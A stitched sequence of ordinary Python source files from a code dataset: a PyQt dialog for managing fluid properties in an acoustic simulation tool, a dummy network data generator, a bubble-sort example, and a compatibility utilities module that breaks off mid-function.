for col_index in [6,7,8,9]:\n self.treeWidget_fluids.hideColumn(col_index)\n #\n self.treeWidget_fluids.itemClicked.connect(self.on_click_item)\n self.treeWidget_fluids.itemDoubleClicked.connect(self.on_doubleclick_item)\n #\n self.lineEdit_name = self.findChild(QLineEdit, 'lineEdit_name')\n self.lineEdit_id = self.findChild(QLineEdit, 'lineEdit_id')\n self.lineEdit_color = self.findChild(QLineEdit, 'lineEdit_color')\n self.lineEdit_fluid_density = self.findChild(QLineEdit, 'lineEdit_fluid_density')\n self.lineEdit_speed_of_sound = self.findChild(QLineEdit, 'lineEdit_speed_of_sound')\n self.lineEdit_impedance = self.findChild(QLineEdit, 'lineEdit_impedance')\n self.lineEdit_isentropic_exponent = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent')\n self.lineEdit_thermal_conductivity = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity')\n self.lineEdit_specific_heat_Cp = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp')\n self.lineEdit_dynamic_viscosity = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity')\n #\n self.lineEdit_name_edit = self.findChild(QLineEdit, 'lineEdit_name_edit')\n self.lineEdit_id_edit = self.findChild(QLineEdit, 'lineEdit_id_edit')\n self.lineEdit_color_edit = self.findChild(QLineEdit, 'lineEdit_color_edit')\n self.lineEdit_fluid_density_edit = self.findChild(QLineEdit, 'lineEdit_fluid_density_edit')\n self.lineEdit_speed_of_sound_edit = self.findChild(QLineEdit, 'lineEdit_speed_of_sound_edit')\n self.lineEdit_impedance_edit = self.findChild(QLineEdit, 'lineEdit_impedance_edit')\n self.lineEdit_isentropic_exponent_edit = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent_edit')\n self.lineEdit_thermal_conductivity_edit = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity_edit')\n self.lineEdit_specific_heat_Cp_edit = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp_edit')\n self.lineEdit_dynamic_viscosity_edit = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity_edit')\n # \n self.lineEdit_name_remove = self.findChild(QLineEdit, 'lineEdit_name_remove')\n self.lineEdit_id_remove = self.findChild(QLineEdit, 'lineEdit_id_remove')\n self.lineEdit_color_remove = self.findChild(QLineEdit, 'lineEdit_color_remove')\n self.lineEdit_fluid_density_remove = self.findChild(QLineEdit, 'lineEdit_fluid_density_remove')\n self.lineEdit_speed_of_sound_remove = self.findChild(QLineEdit, 'lineEdit_speed_of_sound_remove')\n self.lineEdit_impedance_remove = self.findChild(QLineEdit, 'lineEdit_impedance_remove')\n self.lineEdit_isentropic_exponent_remove = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent_remove')\n self.lineEdit_thermal_conductivity_remove = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity_remove')\n self.lineEdit_specific_heat_Cp_remove = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp_remove')\n self.lineEdit_dynamic_viscosity_remove = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity_remove') \n #\n self.create_lists_of_lineEdit()\n\n self.radioButton_all = self.findChild(QRadioButton, 'radioButton_all')\n self.radioButton_selected_lines = self.findChild(QRadioButton, 'radioButton_selected_lines')\n self.radioButton_all.toggled.connect(self.radioButtonEvent)\n self.radioButton_selected_lines.toggled.connect(self.radioButtonEvent)\n\n self.lineEdit_selected_ID = self.findChild(QLineEdit, 'lineEdit_selected_ID')\n\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n self.radioButton_selected_lines.setChecked(True)\n else:\n self.lineEdit_selected_ID.setText(\"All lines\")\n self.lineEdit_selected_ID.setEnabled(False)\n self.radioButton_all.setChecked(True)\n\n self.pushButton_confirm = self.findChild(QPushButton, 'pushButton_confirm')\n self.pushButton_confirm.clicked.connect(self.confirm_fluid_attribution)\n\n self.pushButton_confirm_add_fluid = self.findChild(QPushButton, 'pushButton_confirm_add_fluid')\n self.pushButton_confirm_add_fluid.clicked.connect(self.check_add_fluid)\n\n self.pushButton_reset_entries_add_fluid = self.findChild(QPushButton, 'pushButton_reset_entries_add_fluid')\n self.pushButton_reset_entries_add_fluid.clicked.connect(self.reset_add_texts)\n\n self.pushButton_confirm_fluid_edition = self.findChild(QPushButton, 'pushButton_confirm_fluid_edition')\n self.pushButton_confirm_fluid_edition.clicked.connect(self.check_edit_fluid)\n\n self.pushButton_confirm_fluid_removal = self.findChild(QPushButton, 'pushButton_confirm_fluid_removal')\n self.pushButton_confirm_fluid_removal.clicked.connect(self.confirm_fluid_removal)\n\n self.pushButton_reset_library = self.findChild(QPushButton, 'pushButton_reset_library')\n self.pushButton_reset_library.clicked.connect(self.reset_library_to_default)\n\n self.tabWidget_fluid = self.findChild(QTabWidget, 'tabWidget_fluid')\n # self.tabWidget_fluid.currentChanged.connect(self.tab_event_update)\n \n self.flagAll = self.radioButton_all.isChecked()\n self.flagSelection = self.radioButton_selected_lines.isChecked()\n\n self.loadList()\n self.exec_()\n\n # def tab_event_update(self):\n # self.reset_add_texts()\n # self.reset_edit_texts()\n # self.reset_remove_texts()\n\n def update(self):\n self.lines_ids = self.opv.getListPickedEntities()\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n self.radioButton_selected_lines.setChecked(True)\n self.lineEdit_selected_ID.setEnabled(True)\n else:\n self.lineEdit_selected_ID.setText(\"All lines\")\n self.radioButton_all.setChecked(True)\n self.lineEdit_selected_ID.setEnabled(False)\n\n def write_lines(self, list_node_ids):\n text = \"\"\n for node in list_node_ids:\n text += \"{}, \".format(node)\n self.lineEdit_selected_ID.setText(text)\n\n def create_lists_of_lineEdit(self):\n self.list_add_lineEdit = [ self.lineEdit_name,\n self.lineEdit_id,\n self.lineEdit_color,\n self.lineEdit_fluid_density,\n self.lineEdit_speed_of_sound,\n self.lineEdit_impedance,\n self.lineEdit_isentropic_exponent,\n self.lineEdit_thermal_conductivity,\n self.lineEdit_specific_heat_Cp,\n self.lineEdit_dynamic_viscosity ] \n\n self.list_edit_lineEdit = [ self.lineEdit_name_edit,\n self.lineEdit_id_edit,\n self.lineEdit_color_edit,\n self.lineEdit_fluid_density_edit,\n self.lineEdit_speed_of_sound_edit,\n self.lineEdit_impedance_edit,\n self.lineEdit_isentropic_exponent_edit,\n self.lineEdit_thermal_conductivity_edit,\n self.lineEdit_specific_heat_Cp_edit,\n self.lineEdit_dynamic_viscosity_edit ] \n \n self.list_remove_lineEdit = [ self.lineEdit_name_remove,\n self.lineEdit_id_remove,\n self.lineEdit_color_remove,\n self.lineEdit_fluid_density_remove,\n self.lineEdit_speed_of_sound_remove,\n self.lineEdit_impedance_remove,\n self.lineEdit_isentropic_exponent_remove,\n self.lineEdit_thermal_conductivity_remove,\n self.lineEdit_specific_heat_Cp_remove,\n self.lineEdit_dynamic_viscosity_remove ] \n\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:\n self.confirm_fluid_attribution()\n elif event.key() == Qt.Key_Escape:\n self.close() \n\n def check_input_name(self, name_string):\n if name_string == \"\":\n title = 'Empty fluid name'\n message = \"Please, insert a valid fluid name.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n if self.adding:\n if name_string in self.list_names:\n title = 'Invalid fluid name'\n message = \"Please, inform a different fluid name. It is already being used by other fluid!\"\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['name'] = name_string\n \n def check_input_fluid_id(self, id_string):\n if id_string == \"\":\n title = 'Empty fluid ID'\n message = \"Please, insert a valid fluid ID.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n try:\n self.fluid_id = int(id_string)\n if self.adding:\n if self.fluid_id in self.list_ids:\n title = 'Invalid fluid name'\n message = \"Please, inform a different fluid ID. It is already being used by other fluid.\"\n PrintMessageInput([title, message, window_title1])\n return True\n \n except Exception as err:\n title = \"Invalid fluid ID\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['identifier'] = id_string\n \n def check_input_color(self, color_string):\n if color_string == \"\":\n title = 'Empty [r,g,b] color'\n message = \"Please, insert a valid [r,g,b] color to the fluid.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n \n message = \" Invalid color RGB input! You must input: [value1, value2, value3] \\nand the values must be inside [0, 255] interval.\"\n try:\n self.colorRGB = getColorRGB(color_string)\n message_color = (\" The RGB color {} was already used.\\n Please, input a different color.\").format(self.colorRGB)\n\n if len(self.colorRGB)!=3:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message, window_title1])\n return True\n\n if self.editing:\n temp_colorRGB = getColorRGB(self.temp_fluid_color)\n if temp_colorRGB != self.colorRGB:\n if self.colorRGB in self.list_colors:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message_color, window_title1])\n return True \n else:\n self.list_colors.remove(temp_colorRGB)\n \n elif self.adding:\n if self.colorRGB in self.list_colors:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message_color, window_title1])\n return True\n\n except Exception as err:\n title = 'Invalid [r,g,b] color'\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['color'] = color_string\n \n def check_element_type_of_lines(self):\n\n self.flag_all_fluid_inputs = False\n\n if self.flagSelection:\n \n lineEdit = self.lineEdit_selected_ID.text()\n self.stop, self.lines_typed = self.before_run.check_input_LineID(lineEdit)\n if self.stop:\n return True\n\n for line in self.lines_typed:\n _line = self.dict_tag_to_entity[line]\n if _line.acoustic_element_type in ['wide-duct', 'LRF fluid equivalent', 'LRF full']:\n self.flag_all_fluid_inputs = True \n break\n \n elif self.flagAll:\n for line in self.project.preprocessor.all_lines:\n _line = self.dict_tag_to_entity[line]\n if _line.acoustic_element_type in ['wide-duct', 'LRF fluid equivalent', 'LRF full']:\n self.flag_all_fluid_inputs = True\n break\n \n return False\n\n def check_input_parameters(self, input_string, label, _float=True):\n title = \"INPUT ERROR\"\n value_string = input_string\n if value_string != \"\":\n try:\n if _float:\n value = float(value_string)\n else:\n value = int(value_string) \n if value < 0:\n message = \"You cannot input a negative value to the {}.\".format(label)\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n self.value = value\n except Exception:\n message = \"You have typed an invalid value to the {}.\".format(label)\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n self.value = None\n return False\n\n def check_all_inputs(self):\n\n self.incomplete_inputs = False\n\n if self.check_input_parameters(self.fluid_density_string, 'fluid density'):\n return True\n else:\n fluid_density = self.value\n if fluid_density > 2000:\n title = \"Invalid density value\"\n message = \"The input value for fluid density must be a positive number less than 2000.\"\n PrintMessageInput([title, message, window_title1])\n return False\n self.dict_inputs['fluid density'] = fluid_density\n\n if self.check_input_parameters(self.speed_of_sound_string, 'speed of sound'):\n return True\n else:\n speed_of_sound = self.value\n self.dict_inputs['speed of sound'] = speed_of_sound\n\n impedance = fluid_density*speed_of_sound\n impedance_string = str(fluid_density*speed_of_sound)\n if self.adding:\n self.lineEdit_impedance.setText(impedance_string)\n elif self.editing:\n self.lineEdit_impedance_edit.setText(impedance_string)\n self.dict_inputs['impedance'] = impedance\n \n self.list_empty_inputs = []\n\n if self.isentropic_exponent_string != \"\": \n if self.check_input_parameters(self.isentropic_exponent_string, 'isentropic exponent'):\n return True\n else:\n isentropic_exponent = self.value\n self.dict_inputs['isentropic exponent'] = isentropic_exponent\n else:\n self.list_empty_inputs.append('isentropic exponent')\n self.incomplete_inputs = True\n\n if self.thermal_conductivity_string != \"\": \n if self.check_input_parameters(self.thermal_conductivity_string, 'thermal conductivity'):\n return True\n else:\n thermal_conductivity = self.value \n self.dict_inputs['thermal conductivity'] = thermal_conductivity\n else:\n self.list_empty_inputs.append('thermal conductivity')\n self.incomplete_inputs = True\n\n if self.specific_heat_Cp_string != \"\":\n if self.check_input_parameters(self.specific_heat_Cp_string, 'specific heat Cp'):\n return True\n else:\n specific_heat_Cp = self.value \n self.dict_inputs['specific heat Cp'] = specific_heat_Cp\n else:\n self.list_empty_inputs.append('specific heat Cp')\n self.incomplete_inputs = True\n\n if self.dynamic_viscosity_string != \"\": \n if self.check_input_parameters(self.dynamic_viscosity_string, 'dinamic viscosity'):\n return True\n else:\n dynamic_viscosity = self.value \n self.dict_inputs['dynamic viscosity'] = dynamic_viscosity\n else:\n self.list_empty_inputs.append('dynamic viscosity')\n self.incomplete_inputs = True\n \n if self.incomplete_inputs:\n self.all_fluid_properties_message()\n\n def check_add_edit(self, parameters):\n\n [ name_string, id_string, color_string,\n self.fluid_density_string,\n self.speed_of_sound_string,\n self.impedance_string,\n self.isentropic_exponent_string,\n self.thermal_conductivity_string,\n self.specific_heat_Cp_string,\n self.dynamic_viscosity_string ] = parameters\n\n self.dict_inputs = {}\n\n if self.check_input_name(name_string):\n return\n\n if self.check_input_fluid_id(id_string):\n return\n\n if self.check_input_color(color_string):\n return\n\n if name_string not in self.list_names:\n self.list_names.append(name_string)\n\n if self.fluid_id not in self.list_ids:\n self.list_ids.append(self.fluid_id)\n\n if self.colorRGB not in self.list_colors:\n self.list_colors.append(self.colorRGB)\n\n if self.check_all_inputs():\n return\n \n try:\n config = configparser.ConfigParser()\n config.read(self.fluid_path)\n config[name_string.upper()] = self.dict_inputs\n\n with open(self.fluid_path, 'w') as config_file:\n config.write(config_file)\n \n except Exception as err:\n title = \"Error while saving the fluid data to the file\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return\n\n if self.adding or self.editing: \n self.treeWidget_fluids.clear()\n self.loadList()\n self.adding = False\n self.editing = False\n self.reset_edit_texts()\n\n def confirm_fluid_attribution(self):\n\n if self.clicked_item is None:\n title = \"Empty fluid selection\"\n message = \"Select a fluid in the list before trying to attribute a fluid to the lines.\"\n PrintMessageInput([title, message, window_title1])\n return\n \n if self.check_element_type_of_lines():\n return\n \n try:\n isentropic_exponent = None\n thermal_conductivity = None\n specific_heat_Cp = None\n dynamic_viscosity = None\n list_empty_inputs = []\n\n name = self.clicked_item.text(0)\n identifier = int(self.clicked_item.text(1))\n color = self.clicked_item.text(2)\n fluid_density = float(self.clicked_item.text(3))\n speed_of_sound = float(self.clicked_item.text(4))\n \n title = \"Empty entries in fluid properties\"\n message = \"Please, it is necessary update the fluid properties or select another fluid in the list \" \n message += \"before trying to attribute a fluid to the lines.\"\n message += \"\\n\\nEmpty entries:\\n\"\n \n if self.clicked_item.text(6) != \"\":\n isentropic_exponent = float(self.clicked_item.text(6))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"isentropic exponent\") \n \n if self.clicked_item.text(7) != \"\":\n thermal_conductivity = float(self.clicked_item.text(7))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"thermal conductivity\")\n\n if self.clicked_item.text(8) != \"\":\n specific_heat_Cp = float(self.clicked_item.text(8))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"specific heat Cp\")\n\n if self.clicked_item.text(9) != \"\":\n dynamic_viscosity = float(self.clicked_item.text(9))\n elif self.flag_all_fluid_inputs:\n list_empty_inputs.append(\"dynamic viscosity\") \n\n if list_empty_inputs != []: \n for label in list_empty_inputs:\n message += \"\\n{}\".format(label) \n PrintMessageInput([title, message, window_title1]) \n return \n \n self.fluid = Fluid( name, \n fluid_density, \n speed_of_sound, \n identifier = identifier, \n color = color,\n isentropic_exponent = isentropic_exponent,\n thermal_conductivity = thermal_conductivity,\n specific_heat_Cp = specific_heat_Cp,\n dynamic_viscosity = dynamic_viscosity )\n\n if self.flagSelection:\n\n if self.lineEdit_selected_ID.text() == \"\":\n return\n\n for line in self.lines_ids:\n self.project.set_fluid_by_line(line, self.fluid)\n \n print(\"[Set Fluid] - {} defined at lines: {}\".format(self.fluid.name, self.lines_typed))\n # self.opv.changeColorEntities(self.lines_ids, self.fluid.getNormalizedColorRGB())\n\n elif self.flagAll:\n\n self.project.set_fluid_to_all_lines(self.fluid)\n lines = self.project.preprocessor.all_lines\n\n print(\"[Set Fluid] - {} defined at all lines.\".format(self.fluid.name))\n # self.opv.changeColorEntities(lines, self.fluid.getNormalizedColorRGB())\n\n self.close()\n\n except Exception as err:\n title = \"Error with the fluid list data\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return\n\n def loadList(self):\n\n self.list_names = []\n self.list_ids = []\n self.list_colors = [] \n\n try:\n config = configparser.ConfigParser()\n config.read(self.fluid_path)\n\n for fluid in config.sections():\n\n rFluid = config[fluid]\n keys = config[fluid].keys()\n\n name = str(rFluid['name'])\n identifier = str(rFluid['identifier'])\n color = str(rFluid['color'])\n fluid_density = str(rFluid['fluid density'])\n speed_of_sound = str(rFluid['speed of sound'])\n impedance = str(rFluid['impedance'])\n\n isentropic_exponent, thermal_conductivity, specific_heat_Cp, dynamic_viscosity = \"\", \"\", \"\", \"\"\n if 'isentropic exponent' in keys:\n isentropic_exponent = str(rFluid['isentropic exponent'])\n if 'thermal conductivity' in keys:\n thermal_conductivity = str(rFluid['thermal conductivity'])\n if 'specific heat Cp' in keys:\n specific_heat_Cp = str(rFluid['specific heat Cp'])\n if 'dynamic viscosity' in keys:\n dynamic_viscosity = str(rFluid['dynamic viscosity'])\n \n load_fluid = QTreeWidgetItem([ name, \n identifier, \n color, \n fluid_density, \n speed_of_sound, \n impedance,\n isentropic_exponent,\n thermal_conductivity,\n specific_heat_Cp,\n dynamic_viscosity ])\n colorRGB = getColorRGB(color)\n self.list_names.append(name)\n self.list_ids.append(int(identifier))\n self.list_colors.append(colorRGB)\n load_fluid.setBackground(2, QBrush(QColor(colorRGB[0], colorRGB[1], colorRGB[2])))\n load_fluid.setForeground(2, QBrush(QColor(colorRGB[0], colorRGB[1], colorRGB[2])))\n for i in range(6):\n load_fluid.setTextAlignment(i, Qt.AlignCenter)\n # load_fluid.setForeground(i, QColor(0,0,0))\n self.treeWidget_fluids.addTopLevelItem(load_fluid)\n\n except Exception as err:\n title = \"Error while loading the fluid list data\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n self.close()\n \n def check_add_fluid(self):\n parameters = []\n for lineEdit in self.list_add_lineEdit:\n parameters.append(lineEdit.text())\n self.adding = True\n self.editing = False\n self.check_add_edit( parameters )\n \n def all_fluid_properties_message(self):\n title = \"WARNING - EMPTY ENTRIES IN FLUID INPUTS\"\n message = \"You should input all fluid properties if you are going to use the following acoustic element types: \"\n message += \"wide-duct, LRF fluid equivalent and LRF full.\" \n message += \"\\n\\nEmpty entries:\\n\"\n for label in self.list_empty_inputs:\n message += \"\\n{}\".format(label)\n PrintMessageInput([title, message, window_title2])\n\n def hightlight(self):\n self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 255)\")\n self.treeWidget_fluids.setLineWidth(2)\n\n def remove_hightlight(self):\n self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 0)\")\n self.treeWidget_fluids.setLineWidth(1)\n # t0 = time()\n # dt = 0\n # while dt < 2:\n # dt = time() - t0\n # self.treeWidget_fluids.setStyleSheet(\"color:rgb(0, 0, 0)\")\n # self.treeWidget_fluids.setLineWidth(1)\n\n def check_edit_fluid(self):\n if self.lineEdit_name_edit.text() == \"\":\n title = \"Empty fluid selection\"\n message = \"Please, select a fluid in the list to be edited.\"\n PrintMessageInput([title, message, window_title2])\n self.hightlight()\n return\n parameters = []\n for lineEdit in self.list_edit_lineEdit:\n parameters.append(lineEdit.text())\n self.adding = False\n self.editing = True\n self.remove_hightlight()\n self.check_add_edit( parameters ) \n\n def radioButtonEvent(self):\n self.flagAll = self.radioButton_all.isChecked()\n self.flagSelection = self.radioButton_selected_lines.isChecked()\n if self.flagSelection:\n self.lineEdit_selected_ID.setEnabled(True)\n self.lines_ids = self.opv.getListPickedEntities()\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n else:\n self.lineEdit_selected_ID.setText(\"\")\n elif self.flagAll:\n self.lineEdit_selected_ID.setEnabled(False)\n self.lineEdit_selected_ID.setText(\"All lines\")\n\n def on_click_item(self, item):\n # self.current_index = self.tabWidget_fluid.currentIndex()\n self.clicked_item = item\n N = len(self.list_add_lineEdit)\n for i in range(N):\n self.list_add_lineEdit[i].setText(item.text(i))\n self.list_edit_lineEdit[i].setText(item.text(i))\n self.list_remove_lineEdit[i].setText(item.text(i))\n self.temp_fluid_color = item.text(2) \n\n def on_doubleclick_item(self, item):\n self.clicked_item = item\n self.confirm_fluid_attribution()\n \n def double_confirm_action(self):\n confirm_act = QMessageBox.question(\n self,\n \"QUIT\",\n \"Are you sure you want to reset to default fluids library?\",\n QMessageBox.No | QMessageBox.Yes)\n \n if confirm_act == QMessageBox.Yes:\n return False\n else:\n return True\n\n def confirm_fluid_removal(self):\n self.adding = False\n self.editing = False\n try:\n\n if self.lineEdit_name_remove.text() == \"\":\n title = \"Empty fluid selection\"\n message = \"Please, select a fluid in the list before confirm the removal.\"\n PrintMessageInput([title, message, window_title2])\n self.hightlight()\n return\n\n else:\n config = configparser.ConfigParser()\n config.read(self.fluid_path)\n config.remove_section(self.lineEdit_name_remove.text().upper())\n with open(self.fluid_path, 'w') as config_file:\n config.write(config_file)\n\n for tag, line in self.dict_tag_to_entity.items():\n if line.fluid.name == self.lineEdit_name_remove.text():\n self.project.set_fluid_by_line(tag, None)\n\n self.treeWidget_fluids.clear()\n self.clicked_item = None\n self.loadList()\n self.reset_remove_texts() \n self.remove_hightlight()\n\n except Exception as err:\n title = \"Error with the material removal\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n\n def reset_library_to_default(self):\n if self.double_confirm_action():\n return\n default_fluid_library(self.fluid_path)\n self.treeWidget_fluids.clear()\n self.loadList()\n self.reset_add_texts()\n self.reset_edit_texts() \n self.reset_remove_texts() \n \n def reset_add_texts(self):\n self.lineEdit_name.setText(\"\")\n self.lineEdit_id.setText(\"\")\n self.lineEdit_fluid_density.setText(\"\")\n self.lineEdit_speed_of_sound.setText(\"\")\n self.lineEdit_impedance.setText(\"\")\n self.lineEdit_color.setText(\"\")\n self.lineEdit_isentropic_exponent.setText(\"\")\n self.lineEdit_thermal_conductivity.setText(\"\") \n self.lineEdit_specific_heat_Cp.setText(\"\") \n self.lineEdit_dynamic_viscosity.setText(\"\") \n\n def reset_edit_texts(self):\n self.lineEdit_name_edit.setText(\"\")\n self.lineEdit_id_edit.setText(\"\")\n self.lineEdit_fluid_density_edit.setText(\"\")\n self.lineEdit_speed_of_sound_edit.setText(\"\")\n self.lineEdit_impedance_edit.setText(\"\")\n self.lineEdit_color_edit.setText(\"\")\n self.lineEdit_isentropic_exponent_edit.setText(\"\")\n self.lineEdit_thermal_conductivity_edit.setText(\"\") \n self.lineEdit_specific_heat_Cp_edit.setText(\"\") \n self.lineEdit_dynamic_viscosity_edit.setText(\"\") \n\n def reset_remove_texts(self):\n self.lineEdit_name_remove.setText(\"\")\n self.lineEdit_id_remove.setText(\"\")\n self.lineEdit_fluid_density_remove.setText(\"\")\n self.lineEdit_speed_of_sound_remove.setText(\"\")\n self.lineEdit_impedance_remove.setText(\"\")\n self.lineEdit_color_remove.setText(\"\")\n self.lineEdit_isentropic_exponent_remove.setText(\"\")\n self.lineEdit_thermal_conductivity_remove.setText(\"\") \n self.lineEdit_specific_heat_Cp_remove.setText(\"\") \n self.lineEdit_dynamic_viscosity_remove.setText(\"\") ","sub_path":"data/user_input/model/setup/acoustic/fluidInput.py","file_name":"fluidInput.py","file_ext":"py","file_size_in_byte":34483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498159405","text":"#!/usr/bin/env python3\n\n# Imports\nimport numpy as np\nimport pdb\n\n# Functions\n\n# Classes\nclass Dummy:\n\n def __init__(self, n_labels=5, n_links=500, n_nodes=500):\n\n self.n_labels = n_labels\n self.labels = ['lab-%d' % i for i in range(self.n_labels)]\n\n self.n_links = n_links\n self.links = ['l-%d' % i for i in range(self.n_links)]\n\n self.n_nodes = n_nodes\n self.nodes = ['n-%d' % i for i in range(self.n_nodes)]\n\n self.linkrange = [2,5]\n\n self.node2labels = {}\n self.node2links = {}\n self.link2nodes = {}\n self.link2labels = {}\n self.label2links = {}\n\n def init_networks(self):\n\n \"\"\"\n This initialize the purest network with n-subnetworks for the n-labels\n\n :return:\n \"\"\"\n\n self.populate_link2labels()\n self.map_label2links()\n self.populate_node2links()\n self.map_link2nodes()\n\n return self\n\n def populate_link2labels(self, randn=False):\n\n self.link2labels = {k: self._choose_labels(randn=randn) for k in self.links}\n\n return self\n\n def populate_node2links(self):\n\n self.node2links = {}\n for n in self.nodes:\n lab = np.random.choice(self.labels)\n self.node2links[n] = self._choose_links(self.label2links[lab])\n self.node2labels[n] = {lab}\n\n return self\n\n def map_link2nodes(self):\n\n self.link2nodes = {}\n for n, links in self.node2links.items():\n for l in links:\n if l in self.link2nodes:\n self.link2nodes[l] |= {n}\n else:\n self.link2nodes[l] = {n}\n\n return self\n\n def map_label2links(self):\n\n self.label2links = {}\n for l, labs in self.link2labels.items():\n for lab in labs:\n if lab in self.label2links:\n self.label2links[lab].append(l)\n else:\n self.label2links[lab] = [l]\n\n for lab, links in self.label2links.items():\n self.label2links[lab] = list(set(links))\n\n return self\n\n def _choose_labels(self, randn=False):\n\n return set(np.random.choice(self.labels, np.random.randint(1,self.n_labels) if randn else 1, replace=False))\n\n def _choose_links(self, links=None, n=None):\n\n if not links:\n links = self.links\n\n if n is None:\n n = np.random.randint(self.linkrange[0], self.linkrange[1])\n\n return set(np.random.choice(links, n, replace=False))\n\n def _choose_nodes(self, nodes=None, n=1):\n\n if not nodes:\n nodes = self.nodes\n\n return set(np.random.choice(nodes, n, replace=False))\n\n def multilabel_nodes(self, ratio=0.2):\n\n links = self._choose_links(n=int(np.ceil(self.n_links * ratio)))\n\n for l in links:\n self.link2labels[l] |= self._choose_labels(randn=True)\n if l in self.link2nodes:\n for n in self.link2nodes[l]:\n self.node2labels[n] |= self.link2labels[l]\n\n return self\n\n def write(self, p_data='', labels=True, writemode='w+', header='', dir_dest=''):\n\n if not p_data:\n dataid = ''.join(np.random.choice(list('abcdefgh12345678'), 6))\n dir_dest += '/' if not dir_dest.endswith('/') else ''\n if header:\n p_data = dir_dest + 'dummy_%s-%s.tsv' % (header, dataid)\n else:\n p_data = dir_dest + 'dummy_network-%s.tsv' % dataid\n\n with open(p_data, writemode) as f:\n\n if labels:\n if 'a' not in writemode:\n _ = f.write('nodes\\tlinks\\tlabels\\n')\n for n in self.nodes:\n lab = self.node2labels[n]\n links = self.node2links[n]\n _ = f.write('%s\\t%s\\t%s\\n' % (n, '/'.join(links), '/'.join(lab)))\n\n else:\n if 'a' not in writemode:\n _ = f.write('nodes\\tlinks\\n')\n for n in self.nodes:\n links = self.node2links[n]\n _ = f.write('%s\\t%s\\n' % (n, '/'.join(links)))\n\n return p_data\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"36013107","text":"def BubbleSort_2ndLargest(lst):\n for i in range(len(lst)):\n for j in range(len(lst)-i-1):\n if lst[j] >= lst[j+1]:\n lst[j],lst[j+1]=lst[j+1],lst[j]\n second_largest= lst[-2]\n return second_largest\n\nlst= [10,1,24,6,7,8,3,5,2]\nprint(BubbleSort_2ndLargest(lst))\n","sub_path":"3 Python Programming Examples on Lists/6 2nd Largest number in list using BubbleSort.py","file_name":"6 2nd Largest number in list using BubbleSort.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373414796","text":"\"\"\"\nUtility functions and objects to ease Python 2/3 compatibility,\nand different versions of support libraries.\n\"\"\"\n\nimport re\nimport codecs\nimport warnings\nimport typing as t\n\nif t.TYPE_CHECKING:\n import xml.etree.ElementTree as etree\nelse:\n try:\n from lxml import etree\n except ImportError:\n import xml.etree.ElementTree as etree\n\n\ntry:\n etree_register_namespace = etree.register_namespace\nexcept AttributeError:\n\n import xml.etree.ElementTree as etreenative\n\n def etree_register_namespace(prefix, uri):\n etreenative._namespace_map[uri] = prefix\n\n\ndef cast_bytes(s, enc=\"utf-8\"):\n if isinstance(s, str):\n return s.encode(enc)\n return s\n\n\ndef ascii(stream):\n return codecs.getreader(\"ascii\")(stream)\n\n\ndef bopen(*args, **kwargs):\n return open(*args, mode=\"rb\", **kwargs)\n\n\nlong_type = int\n\n\ndef sign(n):\n if n < 0:\n return -1\n if n > 0:\n return 1\n return 0\n\n\nr_unicodeEscape = re.compile(r\"(\\\\u[0-9A-Fa-f]{4}|\\\\U[0-9A-Fa-f]{8})\")\n\n\ndef _unicodeExpand(s):\n return r_unicodeEscape.sub(lambda m: chr(int(m.group(0)[2:], 16)), s)\n\n\nnarrow_build = False\ntry:\n chr(0x10FFFF)\nexcept ValueError:\n narrow_build = True\n\nif narrow_build:\n\n def _unicodeExpand(s):\n try:\n return r_unicodeEscape.sub(lambda m: chr(int(m.group(0)[2:], 16)), s)\n except ValueError:\n warnings.warn(\n \"Encountered a unicode char > 0xFFFF in a narrow python build. \"\n \"Trying to degrade gracefully, but this can cause problems \"\n \"later when working with the string:\\n%s\" % s\n )\n return r_unicodeEscape.sub(\n lambda m: codecs.decode(m.group(0), \"unicode_escape\"), s\n )\n\n\ndef decodeStringEscape(s):\n r\"\"\"\n s is byte-string - replace \\ escapes in string\n \"\"\"\n\n s = s.replace(\"\\\\t\", \"\\t\")\n s = s.replace(\"\\\\n\", \"\\n\")\n s = s.replace(\"\\\\r\", \"\\r\")\n s = s.replace(\"\\\\b\", \"\\b\")\n s = s.replace(\"\\\\f\", \"\\f\")\n s = s.replace('\\\\\"', '\"')\n s = s.replace(\"\\\\'\", \"'\")\n s = 